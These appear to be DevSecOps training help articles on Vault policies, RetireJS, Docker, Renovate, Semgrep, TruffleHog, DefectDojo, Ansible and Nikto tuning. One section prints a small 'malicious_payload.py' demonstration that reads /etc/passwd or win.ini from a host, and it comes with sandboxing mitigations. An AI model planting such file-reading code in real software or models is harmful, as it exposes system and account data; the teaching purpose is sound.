Understanding that policies are evaluated against the rewritten request path explains why you include /data (and optionally /metadata) in ACL rules, while the same segment is omitted from everyday read/write commands. By aligning your policies with Vault’s internal structure, you avoid permission errors and enforce the principle of least privilege across your secret management workflows. For more details, refer to the official documentation: https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2#acl-rules.
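The rewrite-then-ACL-check flow described above can be made concrete with a small simulation. This is an illustrative sketch only — it mimics the KV v2 path rewrite and a simplified policy matcher, not Vault's real ACL engine:

```python
def rewrite_kv2_path(user_path: str, mount: str = "secret") -> str:
    """Mimic how the KV v2 engine rewrites `vault kv get <mount>/<path>`
    to the internal data endpoint before the ACL check runs."""
    assert user_path.startswith(mount + "/"), "path must begin with the mount point"
    return f"{mount}/data/{user_path[len(mount) + 1:]}"

def policy_matches(policy_path: str, request_path: str) -> bool:
    """Simplified matcher: a trailing `*` is a prefix glob, and `+` matches
    exactly one path segment (loosely modeled on Vault's ACL path rules)."""
    if policy_path.endswith("*"):
        return request_path.startswith(policy_path[:-1])
    p_parts, r_parts = policy_path.split("/"), request_path.split("/")
    return len(p_parts) == len(r_parts) and all(
        p == "+" or p == r for p, r in zip(p_parts, r_parts)
    )

internal = rewrite_kv2_path("secret/cicd/db")           # -> secret/data/cicd/db
print(internal)
print(policy_matches("secret/data/cicd/db", internal))  # correct policy: True
print(policy_matches("secret/cicd/db", internal))       # missing /data: False
```

Running the last two checks shows exactly why a policy written without /data never matches: the ACL engine only ever sees the rewritten path.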

Last updated on Jan 07, 2026

Technical Tips for DevSecOps Labs: RetireJS Ignore Files, Docker Cleanup, LLM Output, and Executable‑Code Examples

Technical Tips for DevSecOps Labs: RetireJS Ignore Files, Docker Cleanup, LLM Output, and Executable‑Code Examples In DevSecOps training you’ll encounter a variety of hands‑on labs that involve security scanning, container management, and large‑language‑model (LLM) interactions. While the concepts are straightforward, the day‑to‑day details—like creating a .retireignore.json file, cleaning up Docker images, or interpreting LLM output—can be confusing for learners. This article consolidates the most common technical questions and provides step‑by‑step guidance, practical examples, and best‑practice tips to keep your lab environment tidy and your results reliable. 1. Managing False Positives with RetireJS – Creating a .retireignore.json File 1.1 Why an Ignore File Is Needed RetireJS is a popular JavaScript library vulnerability scanner. During a scan it may flag known issues that you have already assessed as harmless (false positives). Adding those entries to a .retireignore.json file tells RetireJS to skip them on subsequent runs. 1.2 No Automatic Generator – Manual Entry Is Required RetireJS does not provide a built‑in command to generate the ignore file. You must copy the relevant details from the scan report yourself. The required JSON structure looks like this: { "ignore": [ { "component": "jquery", "version": "3.5.1", "identifiers": ["CVE-2020-11022"] }, { "component": "lodash", "version": "4.17.15", "identifiers": ["CVE-2021-23337"] } ] } 1.3 Step‑by‑Step Manual Process 1. Run the scan – retire --outputformat json > retire-report.json 2. Open the report – locate the false‑positive entry; note the component, version, and any identifiers (CVE, advisory URL, etc.). 3. Edit (or create) .retireignore.json in the project root. 4. Add an object for each false positive using the format above. 5. Save and re‑run the scan to confirm the issues are ignored. Tip: Keep the ignore file under version control so teammates know which findings have been deliberately excluded. 
2. Improving Readability of LLM Output in the Lab Terminal

2.1 The Problem
When you invoke the custom LLM built for the course, the generated text can wrap oddly or become truncated, making it hard to read.

2.2 Quick Fix – Resize the Terminal Pane
- Drag the divider between the exercise instructions and the terminal window to make the terminal wider.
- Increase the number of columns (e.g., from 80 to 120) by adjusting your terminal settings or using stty cols 120.

2.3 Additional Tips
- Long JSON payloads: pipe the output through a formatter, e.g. llm-cli … | jq .
- Colored output looks garbled: disable ANSI colors by adding --no-color to the command.
- Scrolling is required: paginate with less -R, e.g. llm-cli … | less -R.

3. What Does "The Executable Code Can Read Any Operating System" Mean?

3.1 Concept Overview
In the practice exam you may see a statement like "The executable code can read any operating system." This is shorthand for code that can access arbitrary files on the host OS, regardless of whether it runs on Linux, Windows, or macOS.

3.2 Simple Proof-of-Concept Example

# malicious_payload.py – demonstration only
import os

def read_sensitive_file():
    # Linux example
    if os.path.exists('/etc/passwd'):
        with open('/etc/passwd') as f:
            print(f.read())
    # Windows example
    elif os.path.exists(r'C:\Windows\win.ini'):
        with open(r'C:\Windows\win.ini') as f:
            print(f.read())

read_sensitive_file()

Running this script inside a vulnerable model file shows that the attacker can:
- Read /etc/passwd on a Linux host (exposes the list of user accounts and their shells).
- Read C:\Windows\win.ini on a Windows host (reveals system configuration).

The takeaway: A malicious model file is not just a data leak; it can execute arbitrary commands and read any file the executing user can access. Always treat model files as untrusted code.

3.3 Mitigation Checklist
- Run model files in a sandbox or isolated container.
- Apply least‑privilege file system permissions for the execution user. - Use runtime monitoring (e.g., strace, auditd) to detect unexpected file reads. 4. Docker Cleanup: Why Use docker rmi After --rm? 4.1 Understanding the Two Commands | Command | What It Removes | When It Executes | |---------|----------------|------------------| | docker run --rm … | Container – the runtime instance (filesystem, network stack). | Automatically at container exit. | | docker rmi <image> | Image – the read‑only layers stored on disk. | Must be run manually (or scripted). | 4.2 Why Both Are Important in CI/CD 1. Prevent Container Bloat – --rm ensures that stopped containers don’t accumulate in docker ps -a. 2. Free Disk Space – Docker images can be several gigabytes. Removing them with docker rmi reclaims space, which is crucial for shared runners or low‑cost cloud VMs. 3. Guarantee Fresh Pulls – Deleting the image forces the next pipeline run to pull the latest version, avoiding stale layers that could hide new vulnerabilities. 4.3 Example Cleanup Script for a Pipeline # Build and run the test container docker build -t myapp:test . docker run --rm myapp:test # Clean up the image after the job finishes docker rmi myapp:test || echo "Image already removed" Tip: Add docker system prune -f at the end of a long‑running pipeline to remove dangling volumes, networks, and build cache in one go. Common Questions & Quick Tips Q1: Can I generate a .retireignore.json automatically with a script? A: You can write a custom script that parses retire-report.json and outputs the ignore format, but RetireJS itself does not provide this feature. Ensure any automation is reviewed before committing the file. Q2: My LLM output still looks broken after resizing the terminal. A: Try redirecting the output to a file (llm-cli … > output.txt) and open it with a text editor that handles line wrapping. Q3: Is it safe to run untrusted model files on my local machine? A: No. 
Always execute them inside an isolated Docker container or a virtual machine with restricted permissions. Q4: Do I need to run docker rmi on every CI/CD run? A: Not always. In long‑lived build agents, periodic cleanup (e.g., nightly) is sufficient. In ephemeral runners, the container image disappears with the VM, so explicit docker rmi is optional but harmless. Bottom Line - RetireJS ignore files must be edited manually; keep them version‑controlled. - LLM terminal readability improves with pane resizing, pagination, and formatting tools. - Executable‑code examples illustrate how malicious models can read any OS file—use sandboxing to mitigate. - Docker cleanup using both --rm and docker rmi ensures a clean, low‑storage CI/CD environment. Apply these tips in your labs to reduce friction, keep your environments tidy, and focus on mastering DevSecOps concepts rather than troubleshooting avoidable issues. Happy coding!
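As noted in Q1, the ignore file can be generated by a custom script that parses the scan report. A sketch under the assumption that the report exposes component, version, and CVE identifiers roughly as shown — field names vary between Retire.js versions, so inspect your own retire-report.json before relying on this layout:

```python
import json

def build_ignore_entries(report: dict, allowlist: set[str]) -> list[dict]:
    """Collect ignore entries for findings whose CVE identifiers have been
    triaged as false positives (listed in `allowlist`).

    NOTE: the report layout walked below is a simplified assumption;
    verify it against your own Retire.js output.
    """
    entries = []
    for file_result in report.get("data", []):
        for result in file_result.get("results", []):
            cves = [
                cve
                for vuln in result.get("vulnerabilities", [])
                for cve in vuln.get("identifiers", {}).get("CVE", [])
            ]
            matched = sorted(set(cves) & allowlist)
            if matched:
                entries.append({
                    "component": result["component"],
                    "version": result["version"],
                    "identifiers": matched,
                })
    return entries

sample_report = {
    "data": [{
        "file": "static/jquery.js",
        "results": [{
            "component": "jquery",
            "version": "3.5.1",
            "vulnerabilities": [{"identifiers": {"CVE": ["CVE-2020-11022"]}}],
        }],
    }]
}
ignore = {"ignore": build_ignore_entries(sample_report, {"CVE-2020-11022"})}
print(json.dumps(ignore, indent=2))
```

Keeping the allowlist explicit in the script (and the script itself under version control) preserves an audit trail of which findings were deliberately excluded and why.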

Last updated on Jan 07, 2026

Docker User Flags and Environment Variables for Security Tools: When and Why to Use Them

Docker User Flags and Environment Variables for Security Tools: When and Why to Use Them In DevSecOps labs you’ll often run security scanners (Retire.js, Safety, Renovate, Semgrep, TruffleHog) inside Docker containers. A common source of confusion is the use of the --user $(id -u):$(id -g) flag and environment‑variable configuration. This article explains when the user flag is required, how to configure Renovate for different platforms, login requirements for Semgrep, and the role of TruffleHog’s --filesystem --directory option. By the end you’ll know how to run each tool securely and without unnecessary permission problems. 1. Understanding the Docker --user Flag 1.1 What does --user $(id -u):$(id -g) do? - Sets UID/GID – The container runs with the same user and group IDs as the host user who invoked Docker. - Prevents root‑owned files – Files created inside the mounted volume keep the host user’s ownership, avoiding permission headaches later. - Implements least‑privilege – The container does not run as root unless the image explicitly requires it. 1.2 When is the flag necessary? | Scenario | Reason to use --user | |----------|------------------------| | Mounting host source code (e.g., -v $(pwd):/src) | The scanner writes temporary files or caches; you want those files owned by your host user. | | Running on CI agents with non‑root users | Guarantees the container respects the CI runner’s security policy. | | Images that default to root but your policy forbids it | Override the default to comply with organizational guidelines. | 1.3 When can you omit the flag? - Tools that only read files and never create output (e.g., Retire.js, Safety) can safely run as the image’s default user, often root. - The image already defines a non‑root user that matches your needs. Key takeaway: Use the flag only when you need to control file ownership or enforce non‑root execution. It is optional for read‑only scans. 2. Configuring Renovate for GitHub vs. 
GitLab Renovate automates dependency updates. Its configuration differs between platforms because of how authentication and defaults are handled. 2.1 GitHub – Quick start with an environment variable 1. Set the token export RENOVATE_TOKEN=ghp_XXXXXXXXXXXXXXXXXXXX 2. Run Renovate docker run --rm -e RENOVATE_TOKEN hysnsec/renovate renovate USER/REPOSITORY - GitHub’s API accepts a personal access token passed via RENOVATE_TOKEN. - The CLI automatically infers the host (github.com) and the repository from the argument, so no extra config file is needed. 2.2 GitLab – Need a renovate.json (or config.js) file 1. Create a config file (e.g., renovate.json) with at least the platform definition: { "platform": "gitlab", "gitlabEndpoint": "https://gitlab.com/api/v4/", "token": "glpat-XXXXXXXXXXXXXXXXXXXX" } 2. Mount the file and run Renovate: docker run --rm -v $(pwd)/renovate.json:/usr/src/app/renovate.json \ -e RENOVATE_CONFIG_FILE=/usr/src/app/renovate.json \ hysnsec/renovate renovate GROUP/PROJECT - GitLab’s API requires the endpoint URL and often additional settings (e.g., self‑hosted instances). - Because the CLI cannot infer these details from a simple user/repo argument, a configuration file is mandatory. Why the difference? GitHub’s public SaaS API follows a predictable pattern, allowing Renovate to operate with minimal setup. GitLab, especially self‑hosted deployments, varies in URL and authentication, so a config file provides the necessary context. 3. Logging into Semgrep – Do Not Use the Root Account Semgrep’s hosted platform expects each user to authenticate with a personal GitHub or GitLab account that is linked to their Semgrep account. - Do not use the generic training credentials (root:pdso-training). - Avoid corporate GitHub/GitLab accounts because they may lack the required scopes or could expose internal repositories. Recommended login flow 1. Create a personal GitHub/GitLab account (if you don’t already have one). 2. 
Sign up for Semgrep Cloud and link the account. 3. Authenticate via the CLI: run semgrep login and follow the printed URL to approve the session (in non-interactive environments, export the token as the SEMGREP_APP_TOKEN environment variable instead). 4. TruffleHog: Branch Targeting and the --filesystem --directory Flag TruffleHog can scan either Git histories or local filesystem content. 4.1 Scanning a specific branch (Git mode) docker run --rm -v $(pwd):/src hysnsec/trufflehog git \ --repo https://github.com/USER/REPO.git \ --branch develop - The --branch option tells TruffleHog which commit history to analyze. 4.2 Scanning a local directory (Filesystem mode) docker run --rm -v $(pwd):/src hysnsec/trufflehog filesystem \ --directory=/src - No --branch needed because you are scanning the current files, not Git history. 4.3 Role of the --user flag in the examples docker run --user $(id -u):$(id -g) -v $(pwd):/src --rm hysnsec/trufflehog filesystem --directory=/src - Adding --user simply runs the container under your host UID/GID, preventing root‑owned artifacts in /src. - Removing it runs the container as the image's default user (often root). The scan still works; the only difference is file ownership of any temporary data. Bottom line: The --user flag is optional for TruffleHog unless you need to preserve file permissions on the host. 5. Common Questions & Tips | Question | Answer | |----------|--------| | Do I always need --user for Docker security tools? | No. Use it when the tool writes to a mounted volume or when your policy forbids root. | | Can Renovate work with GitLab without a config file? | Only if you use the hosted GitLab SaaS with default endpoints; otherwise a config file is required. | | What token scopes are needed for Renovate on GitHub? | repo (full control of private repos) and read:org if you work with organization resources. | | Is it safe to run Semgrep with my corporate GitHub account? | Not recommended. Use a personal account that you control and that has only the necessary repository access. | | Why does TruffleHog sometimes fail with permission errors?
| The container may be running as root and creates files owned by root. Adding --user $(id -u):$(id -g) resolves this. | Quick tip: Always test a Docker command without --user first. If you see “permission denied” when the container writes to a host‑mounted directory, re‑run with the flag. 6. Summary - The Docker --user $(id -u):$(id -g) flag is optional and only required for write‑access scenarios or strict least‑privilege policies. - Renovate’s GitHub integration is streamlined via an environment variable, whereas GitLab needs a configuration file to specify endpoint and token details. - Semgrep login must use a personal GitHub/GitLab account; the generic root credentials are not valid. - TruffleHog’s --filesystem --directory mode scans local files and does not depend on the --user flag; the flag only influences file ownership on the host. By understanding these nuances, you can run security tools efficiently, keep your host environment clean, and stay compliant with best‑practice DevSecOps workflows.

Last updated on Jan 06, 2026

Managing IDs, Environments, and Compatibility in DefectDojo

Managing IDs, Environments, and Compatibility in DefectDojo DefectDojo is a powerful open‑source platform for aggregating, normalizing, and tracking security findings across many tools and pipelines. Learners often wonder how to locate key identifiers (engagement, project, lead), which scans belong to SAST versus DAST, whether specific tools such as InSpec or TruffleHog integrate smoothly, and how to troubleshoot missing data after an automated upload. This article walks through each of those topics step‑by‑step, provides practical examples, and offers quick‑reference tips for a smooth DevSecOps workflow. 1. Retrieving Core IDs (Engagement, Project, Lead) Every finding in DefectDojo is tied to three primary objects: | Object | Purpose | Where to Find It | |--------|---------|------------------| | Project | Top‑level container for a product or application | Products → Product List → click the product; URL contains product_id= | | Engagement | Represents a specific test window (e.g., a quarterly SAST run) | Engagements → Engagement List → click the engagement; URL contains engagement_id= | | Lead | The user who owns or is responsible for the engagement | Inside the engagement detail page under Lead field (user ID appears in the URL as lead=) | Quick CLI/Script Method If you prefer automation, the DefectDojo REST API can return these IDs in JSON: # Example: Get all engagements for a product curl -s -H "Authorization: Token $DD_API_KEY" \ "https://dojo.example.com/api/v2/engagements/?product=$PRODUCT_ID" \ | jq '.results[] | {id: .id, name: .name, lead: .lead}' Replace $DD_API_KEY and $PRODUCT_ID with your token and product ID. The output lists each engagement’s id and the associated lead user ID. 2. Understanding Which Scans Belong to SAST vs. 
DAST DefectDojo does not enforce a strict taxonomy, but the exam and real‑world practice follow common industry conventions: | Category | Typical Tools (examples) | What They Scan | |----------|--------------------------|----------------| | SAST (Static Application Security Testing) | bandit, semgrep, trufflehog, secret-scan | Source code, configuration files, embedded secrets | | DAST (Dynamic Application Security Testing) | sslyze, nikto, nmap, OWASP ZAP | Running applications, network services, SSL/TLS configurations | Tip: When a practice‑test question mentions “implement SAST,” you can safely assume it expects a static analysis tool (e.g., secret scanning) rather than a network scanner. 3. Compatibility of InSpec Results with DefectDojo Native Support DefectDojo includes a built‑in parser for InSpec compliance reports. To use it: 1. Export the InSpec run as JSON: inspec exec . --reporter json:inspec-report.json 2. Upload the JSON file via the Import Scan UI or through the API (/api/v2/import-scan/). Other “Code‑as‑Configuration” (CaC) Tools If a tool does not have a dedicated parser, you can still ingest its output by: - Converting the report to a supported format (e.g., JUnit XML, SARIF, or generic JSON). - Using the Generic Findings Importer in DefectDojo, which maps custom fields to the standard schema. A curated list of supported parsers is maintained at the official documentation site: DefectDojo Integrations – File Parsers 4. Uploading TruffleHog Scan Results from CI/CD Common Pitfall When a CI job reports “upload successful” but only the file name appears in DefectDojo (no findings), the most likely cause is an incorrect output format. DefectDojo expects the JSON representation of TruffleHog results. Step‑by‑Step Troubleshooting 1. Generate JSON Locally trufflehog git file://$(pwd) --json > trufflehog-report.json 2. Validate the JSON – open it in a text editor; you should see an array of objects with path, reason, line, etc. 3. 
Manual GUI Test - Navigate to Findings → Import Scan. - Choose TruffleHog as the parser, upload trufflehog-report.json, and click Import. - Verify that individual findings appear. 4. CI/CD Integration - Ensure the pipeline step uses the JSON file, not the default plain‑text output. - Example (GitLab CI): trufflehog_scan: script: - trufflehog git file://$CI_PROJECT_DIR --json > trufflehog.json - curl -X POST "$DD_API_URL/api/v2/import-scan/" \ -H "Authorization: Token $DD_API_KEY" \ -F "file=@trufflehog.json" \ -F "scan_type=TruffleHog" 5. Confirm Permissions – the API token must have Import Scan scope for the target product/engagement. If the issue persists after these steps, capture the API response (status code and body) and share it with the support team for deeper analysis. 5. Practical Example: End‑to‑End SAST Workflow 1️⃣ Code commit → GitHub Action runs Semgrep (SAST) → generates SARIF report. 2️⃣ Action calls DefectDojo API: POST /api/v2/import-scan/ - file: semgrep-report.sarif - scan_type: "Semgrep" - engagement: 42 - lead: 7 3️⃣ DefectDojo creates findings, links them to Engagement #42, and notifies Lead #7. 4️⃣ Lead reviews findings, marks false positives, and closes the engagement. This flow illustrates how IDs, scan type, and tool compatibility all intersect in a real pipeline. 6. Common Questions & Quick Tips | Question | Answer | |----------|--------| | How do I know which parser to select in the UI? | Look at the file extension and the tool name. The UI lists supported parsers alphabetically; hover for a short description. | | Can I import multiple scan files at once? | Yes. Zip the files together and select “Multiple Files” import; each file will be parsed individually. | | What if my tool isn’t listed? | Convert the output to SARIF or JUnit XML, both of which have generic parsers. | | Do I need a separate engagement for each scan type? 
| Not required, but recommended for reporting clarity (e.g., one engagement for quarterly SAST, another for monthly DAST). | | How do I automate ID discovery in scripts? | Use the REST endpoints /api/v2/products/, /api/v2/engagements/, and /api/v2/users/ with jq or any JSON parser. | Pro Tips - Bookmark the parser reference page – it’s updated with every new release. - Tag each engagement with a meaningful name (e.g., Q4‑2025‑SAST) to locate IDs quickly. - Enable webhook notifications for new findings so leads receive instant alerts. 7. Next Steps 1. Review the Practice Exam Solutions for concrete examples of SAST/DAST mapping. 2. Test the InSpec and TruffleHog import processes in a sandbox environment before adding them to production pipelines. 3. Automate ID retrieval with a small Python script that stores project_id, engagement_id, and lead_id in environment variables for CI jobs. By mastering ID handling, understanding scan categories, and confirming tool compatibility, you’ll keep your DefectDojo instance clean, actionable, and ready for any DevSecOps certification exam or real‑world deployment. Happy scanning!
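The "automate ID retrieval" step above can be sketched with only the standard library. This is a minimal sketch, not an official client: it assumes the /api/v2/engagements/ endpoint shown earlier, a token in DD_API_KEY, and a placeholder base URL — adjust all three for your instance.

```python
# Sketch: discover DefectDojo engagement and lead IDs for CI jobs.
# Assumptions: /api/v2/engagements/ response shape as documented above;
# base URL and env-var names are placeholders.
import json
import os
import urllib.request


def extract_ids(payload):
    """Map engagement name -> (engagement id, lead user id) from an
    /api/v2/engagements/ response body."""
    return {
        e["name"]: (e["id"], e["lead"])
        for e in payload.get("results", [])
    }


def fetch_engagements(base_url, product_id, token):
    # Query the REST API with the same header the curl example uses.
    req = urllib.request.Request(
        f"{base_url}/api/v2/engagements/?product={product_id}",
        headers={"Authorization": f"Token {token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    payload = fetch_engagements(
        "https://dojo.example.com",
        os.environ["PRODUCT_ID"],
        os.environ["DD_API_KEY"],
    )
    for name, (eng_id, lead_id) in extract_ids(payload).items():
        print(f"{name}: engagement={eng_id} lead={lead_id}")
```

In a CI job you would capture this output and export the IDs as environment variables for later pipeline stages.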

Last updated on Jan 06, 2026

Ansible Playbooks & CI/CD Pipelines: SSH Handling, YAML Structure, and Playbook Elements Explained

Ansible Playbooks & CI/CD Pipelines: SSH Handling, YAML Structure, and Playbook Elements Explained Introduction When you start automating infrastructure with Ansible inside a CI/CD pipeline, you quickly encounter two recurring topics: how to manage SSH authentication without manual prompts and how to write a valid playbook.yml file. Both are essential for reliable, repeatable deployments. This article breaks down the reasoning behind using ssh‑add (or ssh-agent) instead of simply copying a private key, clarifies the YAML syntax that defines a playbook, and explains the purpose of key sections such as name, hosts, and roles. By the end, you’ll have a solid reference you can apply to any Ansible‑based DevSecOps lab or certification exercise. 1. SSH Authentication in CI/CD Pipelines 1.1 Why not just copy the private key to ~/.ssh? In a typical development workstation you might place a private key (id_rsa) in ~/.ssh and use it directly. In a CI/CD runner, however, the environment is ephemeral and non‑interactive. When Ansible tries to connect to a remote host, the SSH client may still ask for a passphrase or confirmation (e.g., “Are you sure you want to continue connecting (yes/no)?”). Because the pipeline cannot respond to prompts, the job would fail. 1.2 The role of ssh-agent and ssh-add Running an SSH agent creates a background process that holds the private key in memory. The command ssh-add loads the key into that agent. Once loaded: - The key is available to any subsequent SSH command without reading it from the filesystem each time. - Passphrase‑protected keys can be supplied once (or stored in a CI secret) and then reused automatically. - The agent eliminates the “first‑time host verification” prompt when you also pre‑populate known_hosts. 
In practice, the CI step looks like this: stage: prod image: willhallonline/ansible:2.9-ubuntu-18.04 before_script: # 1️⃣ Create the .ssh directory - mkdir -p ~/.ssh # 2️⃣ Write the secret private key (provided as a CI variable) to a file - echo "$DEPLOYMENT_SERVER_SSH_PRIVKEY" | tr -d '\r' > ~/.ssh/id_rsa - chmod 600 ~/.ssh/id_rsa # 3️⃣ Start the SSH agent and load the key - eval "$(ssh-agent -s)" - ssh-add ~/.ssh/id_rsa If you remove the ssh-agent/ssh-add lines and run the pipeline, you’ll see the job stall on an SSH prompt, confirming the necessity of the agent in automated environments. 1.3 Quick tip Store the private key as a protected CI variable (e.g., DEPLOYMENT_SERVER_SSH_PRIVKEY) and never commit it to source control. 2. Understanding the YAML Structure of an Ansible Playbook 2.1 Lists vs. Mappings in YAML YAML distinguishes two fundamental data structures: | Structure | Symbol | Example | |-----------|--------|---------| | Mapping (key‑value pair) | : | hosts: prod | | List (ordered collection) | - (hyphen) | - name: Install Terraform | A playbook is a list of plays. Each play is a mapping that contains keys such as name, hosts, remote_user, become, roles, and tasks. Because the playbook itself is a list, the first line of every play starts with a hyphen. - name: Deploy web tier hosts: webservers become: true roles: - nginx - monitoring - The hyphen before name tells YAML “this is the first item in the outer list (the play).” - Inside the play, keys (hosts, become, etc.) are mappings, so they do not use hyphens. 2.2 When to add a hyphen | Context | Use a hyphen? | Reason | |---------|---------------|--------| | Beginning of a play (top‑level) | Yes | Starts a new item in the playbook list. | | Defining a role or task within a play | Yes | Each role or task is an element of its own list (roles: or tasks:). | | Simple key/value pair like hosts: or remote_user: | No | These are mappings inside the current play. | 3. 
Key Playbook Elements Explained 3.1 name – Human‑readable identifier - What it is: A descriptive label for the play (or for a task/role). - Why it matters: Makes ansible-playbook output readable and helps teammates understand the intent without digging into the code. - name: "Provision AWS EC2 instances" hosts: localhost ... 3.2 hosts – Target inventory group - What it is: The inventory pattern that selects which machines the play runs against. - Why no hyphen: hosts is a key inside the play’s mapping, not an item of a list. hosts: prod # selects the “prod” group from your inventory 3.3 roles – Reusable collections of tasks, handlers, vars, etc. - What it is: A list of role names (often pulled from Ansible Galaxy). - Why hyphenated: Each role is an element in the roles list. roles: - secfigo.terraform # first role - mycompany.firewall # second role 3.4 tasks – Individual actions - What it is: A list of task dictionaries, each with its own name and module call. tasks: - name: Ensure firewalld is latest apt: name: firewalld state: latest 4. Practical Example: Minimal Playbook for Hardening a Docker Host --- - name: Harden Docker host (CI/CD friendly) hosts: docker_host remote_user: ansible become: true # 1️⃣ Load the SSH key via the pipeline (see Section 1) # 2️⃣ Apply hardening role from Galaxy roles: - secfigo.docker_hardening # 3️⃣ Optional custom tasks tasks: - name: Verify firewalld is active service: name: firewalld state: started Notice the hyphen before name (starting a new play) and before each role and task (list items). 5. Common Questions & Tips Q1: Do I still need ssh-agent if my private key has no passphrase? A: Not strictly, but using an agent is a best practice because it centralizes key handling and avoids accidental exposure of the key file to other processes. Q2: Can I mix hyphenated and non‑hyphenated lines inside a play? A: Yes. Only list items need hyphens. All other key/value pairs remain plain mappings. 
Q3: What happens if I forget a hyphen before a role? A: Ansible will treat roles: as a mapping with a single string value, causing a syntax error like “list object has no attribute 'items'”. Tip: Validate YAML early ansible-playbook --syntax-check playbook.yml Running the syntax check in your CI pipeline catches indentation or hyphen mistakes before the job proceeds to actual deployment. Conclusion Managing SSH authentication with ssh-agent and ssh-add ensures your CI/CD pipelines stay non‑interactive and secure. Understanding YAML’s distinction between lists (hyphen‑prefixed) and mappings (colon‑separated) lets you craft clean, error‑free Ansible playbooks. By mastering the roles of name, hosts, and roles, you’ll write playbooks that are both human‑readable and machine‑ready—key skills for any DevSecOps professional. Keywords: Ansible playbook, CI/CD SSH handling, ssh-agent, yaml list hyphen, ansible roles, devsecops automation
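As a companion to the syntax check above, the two most common playbook mistakes covered in this article — tabs used for indentation and a missing top‑level hyphen — can be caught with a tiny heuristic sketch. This is not a YAML parser; `ansible-playbook --syntax-check` remains the real validation step.

```python
# Sketch: heuristic pre-flight check for common playbook mistakes
# (tabs in indentation, no list item at the top level). Not a YAML
# parser -- use `ansible-playbook --syntax-check` for real validation.

def playbook_issues(text):
    issues = []
    lines = text.splitlines()
    for lineno, line in enumerate(lines, start=1):
        if "\t" in line:
            issues.append(f"line {lineno}: tab character (YAML requires spaces)")
    # The first real line should start a play, i.e. a list item.
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped == "---":
            continue  # skip blanks, comments, and the document marker
        if not stripped.startswith("- "):
            issues.append("top level: plays must be list items (start with '- ')")
        break
    return issues
```

Running this in a pre-commit hook gives faster feedback than waiting for the CI job to fail.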

Last updated on Jan 06, 2026

Optimizing Dynamic Application Security Testing (DAST) with Nikto: Speed, Configuration, and Best Practices

Optimizing Dynamic Application Security Testing (DAST) with Nikto: Speed, Configuration, and Best Practices Dynamic Application Security Testing (DAST) is a cornerstone of modern DevSecOps pipelines. Tools like Nikto provide powerful vulnerability discovery for web applications, but they can become a bottleneck if not tuned correctly. This article explains how to keep DAST scans fast and reliable in CI/CD, how to configure Nikto to skip irrelevant ports or plugins, and how to resolve common configuration errors—especially when generating CSV reports. Introduction Running a DAST scan on every commit gives developers rapid feedback on security flaws, but a scan that takes 30 minutes or more defeats the purpose of continuous integration. By focusing the scan on high‑risk assets, parallelizing work, and fine‑tuning Nikto’s configuration, you can achieve accurate results without slowing down your pipeline. Below you’ll find step‑by‑step guidance, practical examples, and troubleshooting tips that work for both commercial scanners and the open‑source Nikto tool. 1. Reducing DAST Scan Time in CI/CD Pipelines 1.1 Scan Only What Matters | Action | Why it Helps | How to Implement | |--------|--------------|------------------| | Target critical paths | Eliminates low‑value URLs that inflate scan duration. | Identify the most exposed endpoints (login, API, file upload) and feed them to the scanner via a whitelist or a “focus list.” | | Limit the attack surface | Fewer ports, protocols, and technologies to probe. | Use SKIPPORTS and SKIPIDS (see Section 2) to ignore known safe services. | | Prioritize high‑severity plugins | Concentrates resources on likely exploitable issues. | Configure the scanner to run only “critical” or “high” rule sets. | 1.2 Parallelize Scans - Split the application into logical components (e.g., micro‑services, separate domains) and run independent scans in parallel CI jobs.
- Use your CI platform’s matrix strategy (GitHub Actions, GitLab CI, Azure Pipelines) to launch multiple Nikto instances simultaneously, each with its own -h target. 1.3 Leverage Passive Scanning If your commercial DAST solution offers a passive mode, enable it for every build. Passive scans analyze traffic logs or proxy data without actively probing the target, providing quick insights while a full active scan runs on a scheduled basis (e.g., nightly). 1.4 Review the Scan Strategy - Some tools use exhaustive crawling that repeats the same request many times. - Contact the vendor’s support to request a lighter scan profile or to verify that the tool isn’t misconfigured (e.g., default timeout values set too high). 1.5 When to Consider an Alternative If the commercial scanner cannot meet your time constraints after optimization, evaluate lighter open‑source alternatives (Nikto, OWASP ZAP, w3af) for fast “smoke‑test” scans, reserving the heavyweight scanner for deep, scheduled assessments. 2. Configuring Nikto to Skip Ports and Plugins 2.1 Skipping Known‑Safe Ports # nikto.conf SKIPPORTS=21 22 111 Scenario: Your internal server must expose SSH on port 22. Scanning port 22 will always return a “open” result, which you already know is intentional. By adding 22 to SKIPPORTS, Nikto ignores it, reducing false‑positive noise and scan time. 2.2 Skipping Unwanted Plugin IDs Each Nikto vulnerability check has a unique ID (e.g., 1010 for “Silverstream”). If a component is not present in your environment, you can suppress its output: # nikto.conf SKIPIDS=1010,1025 # 1010 = Silverstream, 1025 = Another false positive Result: Nikto will not execute those checks, preventing irrelevant findings and speeding up the scan. 2.3 Combining Options A typical configuration file for a fast CI scan might look like: # nikto.conf – minimal CI/CD configuration SKIPPORTS=21 22 111 SKIPIDS=1010,1025 # Optional: limit the number of concurrent threads THREADS=5 3. 
Generating CSV Output – Fixing the “CSV configuration seems to be incorrect” Error 3.1 Understanding the Error Nikto expects the output format and file name to be passed either via command‑line options or through the CLIOPTS variable in the configuration file. Mixing both without proper syntax triggers the “CSV configuration seems to be incorrect” message. 3.2 Correct Configuration Example Create or overwrite nikto.conf with the required CLI options: cat > /opt/nikto/nikto.conf <<EOF SKIPPORTS=21 22 111 CLIOPTS="-output result.csv -Format csv" EOF 3.3 Running the Scan ./nikto.pl -config /opt/nikto/nikto.conf -h prod-d3x3q35y What changed? - CLIOPTS now contains the exact flags (-output and -Format) that Nikto needs to produce a CSV file. - No additional -Format or -o arguments are required on the command line, preventing duplicate or conflicting parameters. 3.4 Verifying the Output After the scan completes, you should find result.csv in the working directory. Open it with any spreadsheet program to confirm that headers and rows are correctly formatted. 4. Best‑Practice Checklist for DAST with Nikto - Define a scope: List critical URLs, ports, and services. - Create a minimal nikto.conf: Use SKIPPORTS, SKIPIDS, and CLIOPTS. - Run scans in parallel: Split large applications into separate CI jobs. - Use passive scans for every commit; schedule full scans nightly. - Monitor scan duration: Set CI job timeouts and alert on regressions. - Review false positives regularly and update SKIPIDS accordingly. - Document changes: Keep a version‑controlled copy of nikto.conf alongside your codebase. Common Questions | Question | Answer | |----------|--------| | Why does my scan still take >30 min after skipping ports? | Check for deep crawling (large site maps) and limit the -maxdepth flag, or split the site into smaller targets. | | Can I skip entire directories? | Yes. Use the -exclude option (e.g., -exclude /admin) or add the corresponding plugin IDs to SKIPIDS. 
